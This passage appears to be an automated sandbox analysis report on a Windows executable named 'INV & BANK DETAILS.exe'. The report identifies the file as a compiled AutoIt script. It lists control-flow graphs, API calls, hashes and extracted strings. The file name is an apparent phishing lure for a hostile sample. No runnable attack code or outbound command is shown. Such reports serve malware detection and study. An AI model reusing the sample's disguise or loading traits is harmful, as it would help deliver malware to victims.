                                • Opcode Fuzzy Hash: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1318 46e1a6-46e1ba 1319 46e1c0-46e1cd call 40c650 1318->1319 1320 46e45e 1318->1320 1319->1320 1325 46e1d3-46e1d7 1319->1325 1321 46e462-46e47d call 4533eb call 445ae0 1320->1321 1329 46e483-46e48a 1321->1329 1330 46e1dc-46e1e3 1321->1330 1325->1321 1331 46e2e7-46e2fa call 40f760 1330->1331 1332 46e1e9-46e214 call 45340c call 411567 call 413e1f 1330->1332 1338 46e2fc-46e30b call 403cd0 1331->1338 1339 46e30d-46e343 call 45340c call 413a0e 1331->1339 1350 46e216-46e255 call 411567 call 411536 call 45340c call 411536 1332->1350 1351 46e258-46e282 call 45340c call 411567 call 433998 1332->1351 1347 46e2c8-46e2e4 call 408f40 1338->1347 1356 46e374-46e3fa call 411567 call 411536 * 3 call 45340c call 433784 call 4339fa 1339->1356 1357 46e345-46e34d 1339->1357 1350->1351 1379 46e284-46e29c call 4111c1 1351->1379 1380 46e29e-46e2c2 call 45340c call 44bd27 1351->1380 1397 46e403-46e405 1356->1397 1398 46e3fc-46e3ff 1356->1398 1357->1356 1358 46e34f-46e371 call 411567 * 2 1357->1358 1358->1356 1379->1347 1379->1380 1380->1329 1380->1347 1399 46e407-46e41e call 45340c call 452ac7 1397->1399 1401 46e436-46e444 call 408f40 1397->1401 1398->1399 1400 46e401 1398->1400 1409 46e423-46e425 1399->1409 1400->1401 1406 46e44b-46e45b call 431e58 1401->1406 1409->1406 1411 46e427-46e431 call 403cd0 1409->1411 1411->1401
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID: >>>AUTOIT SCRIPT<<<$\
                                • API String ID: 0-1896584978
                                • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99

                                Control-flow Graph

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INV & BANK DETAILS.exe,00000104,?), ref: 00401F4C
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • __wcsicoll.LIBCMT ref: 00402007
                                • __wcsicoll.LIBCMT ref: 0040201D
                                • __wcsicoll.LIBCMT ref: 00402033
                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                • __wcsicoll.LIBCMT ref: 00402049
                                • _wcscpy.LIBCMT ref: 0040207C
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INV & BANK DETAILS.exe,00000104), ref: 00428B5B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\INV & BANK DETAILS.exe$CMDLINE$CMDLINERAW
                                • API String ID: 3948761352-380545132
                                • Opcode ID: c7db578a58d049c9f477fac5dc1f618de62341779cf4fb077178cc74bd876c41
                                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                • Opcode Fuzzy Hash: c7db578a58d049c9f477fac5dc1f618de62341779cf4fb077178cc74bd876c41
                                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __fread_nolock$_fseek_wcscpy
                                • String ID: D)E$D)E$FILE
                                • API String ID: 3888824918-361185794
                                • Opcode ID: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                • Opcode Fuzzy Hash: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                • __wsplitpath.LIBCMT ref: 0040E41C
                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                • _wcsncat.LIBCMT ref: 0040E433
                                • __wmakepath.LIBCMT ref: 0040E44F
                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                • _wcscpy.LIBCMT ref: 0040E487
                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                • _wcscat.LIBCMT ref: 00427541
                                • _wcslen.LIBCMT ref: 00427551
                                • _wcslen.LIBCMT ref: 00427562
                                • _wcscat.LIBCMT ref: 0042757C
                                • _wcsncpy.LIBCMT ref: 004275BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                • String ID: Include$\
                                • API String ID: 3173733714-3429789819
                                • Opcode ID: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                • Opcode Fuzzy Hash: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                Control-flow Graph

                                APIs
                                • _fseek.LIBCMT ref: 0045292B
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                • __fread_nolock.LIBCMT ref: 00452961
                                • __fread_nolock.LIBCMT ref: 00452971
                                • __fread_nolock.LIBCMT ref: 0045298A
                                • __fread_nolock.LIBCMT ref: 004529A5
                                • _fseek.LIBCMT ref: 004529BF
                                • _malloc.LIBCMT ref: 004529CA
                                • _malloc.LIBCMT ref: 004529D6
                                • __fread_nolock.LIBCMT ref: 004529E7
                                • _free.LIBCMT ref: 00452A17
                                • _free.LIBCMT ref: 00452A20
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                • String ID:
                                • API String ID: 1255752989-0
                                • Opcode ID: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                • Opcode Fuzzy Hash: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                • RegisterClassExW.USER32(00000030), ref: 004104ED
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                • ImageList_ReplaceIcon.COMCTL32(00C33438,000000FF,00000000), ref: 00410552
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                • API String ID: 2914291525-1005189915
                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                • LoadIconW.USER32(?,00000063), ref: 004103C0
                                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                • RegisterClassExW.USER32(?), ref: 0041045D
                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00C33438,000000FF,00000000), ref: 00410552
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                • String ID: #$0$AutoIt v3
                                • API String ID: 423443420-4155596026
                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _malloc
                                • String ID: Default
                                • API String ID: 1579825452-753088835
                                • Opcode ID: 52280e62c68f30ae585b8c692c478d417b44ff92b6feebed6a1ade32e4dbe530
                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                • Opcode Fuzzy Hash: 52280e62c68f30ae585b8c692c478d417b44ff92b6feebed6a1ade32e4dbe530
                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2137 40f5c0-40f5cf call 422240 2140 40f5d0-40f5e8 2137->2140 2140->2140 2141 40f5ea-40f613 call 413650 call 410e60 2140->2141 2146 40f614-40f633 call 414d04 2141->2146 2149 40f691 2146->2149 2150 40f635-40f63c 2146->2150 2151 40f696-40f69c 2149->2151 2152 40f660-40f674 call 4150d1 2150->2152 2153 40f63e 2150->2153 2157 40f679-40f67c 2152->2157 2154 40f640 2153->2154 2156 40f642-40f650 2154->2156 2158 40f652-40f655 2156->2158 2159 40f67e-40f68c 2156->2159 2157->2146 2160 40f65b-40f65e 2158->2160 2161 425d1e-425d3e call 4150d1 call 414d04 2158->2161 2162 40f68e-40f68f 2159->2162 2163 40f69f-40f6ad 2159->2163 2160->2152 2160->2154 2174 425d43-425d5f call 414d30 2161->2174 2162->2158 2165 40f6b4-40f6c2 2163->2165 2166 40f6af-40f6b2 2163->2166 2168 425d16 2165->2168 2169 40f6c8-40f6d6 2165->2169 2166->2158 2168->2161 2171 425d05-425d0b 2169->2171 2172 40f6dc-40f6df 2169->2172 2171->2156 2173 425d11 2171->2173 2172->2158 2173->2168 2174->2151
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __fread_nolock_fseek_memmove_strcat
                                • String ID: AU3!$EA06
                                • API String ID: 1268643489-2658333250
                                • Opcode ID: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                • Opcode Fuzzy Hash: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2177 401100-401111 2178 401113-401119 2177->2178 2179 401179-401180 2177->2179 2181 401144-40114a 2178->2181 2182 40111b-40111e 2178->2182 2179->2178 2180 401182 2179->2180 2183 40112c-401141 DefWindowProcW 2180->2183 2185 401184-40118e call 401250 2181->2185 2186 40114c-40114f 2181->2186 2182->2181 2184 401120-401126 2182->2184 2184->2183 2188 42b038-42b03f 2184->2188 2192 401193-40119a 2185->2192 2189 401151-401157 2186->2189 2190 40119d 2186->2190 2188->2183 2191 42b045-42b059 call 401000 call 40e0c0 2188->2191 2195 401219-40121f 2189->2195 2196 40115d 2189->2196 2193 4011a3-4011a9 2190->2193 2194 42afb4-42afc5 call 40f190 2190->2194 2191->2183 2193->2184 2199 4011af 2193->2199 2194->2192 2195->2184 2202 401225-42b06d call 468b0e 2195->2202 2200 401163-401166 2196->2200 2201 42b01d-42b024 2196->2201 2199->2184 2206 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2199->2206 2207 4011db-401202 SetTimer RegisterWindowMessageW 2199->2207 2209 42afe9-42b018 call 40f190 call 401a50 2200->2209 2210 40116c-401172 2200->2210 2201->2183 2208 42b02a-42b033 call 4370f4 2201->2208 2202->2192 2207->2192 2216 401204-401216 CreatePopupMenu 2207->2216 2208->2183 2209->2183 2210->2184 2211 401174-42afde call 45fd57 2210->2211 2211->2183 2228 42afe4 2211->2228 2228->2192
                                APIs
                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                • CreatePopupMenu.USER32 ref: 00401204
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                • String ID: TaskbarCreated
                                • API String ID: 129472671-2362178303
                                • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2229 4115d7-4115df 2230 4115ee-4115f9 call 4135bb 2229->2230 2233 4115e1-4115ec call 411988 2230->2233 2234 4115fb-4115fc 2230->2234 2233->2230 2237 4115fd-41160e 2233->2237 2238 411610-41163b call 417fc0 call 41130a 2237->2238 2239 41163c-411656 call 4180af call 418105 2237->2239 2238->2239
                                APIs
                                • _malloc.LIBCMT ref: 004115F1
                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                • std::exception::exception.LIBCMT ref: 00411626
                                • std::exception::exception.LIBCMT ref: 00411640
                                • __CxxThrowException@8.LIBCMT ref: 00411651
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                • String ID: ,*H$4*H$@fI
                                • API String ID: 615853336-1459471987
                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                Control-flow Graph

                                • Executed
                                • Not Executed
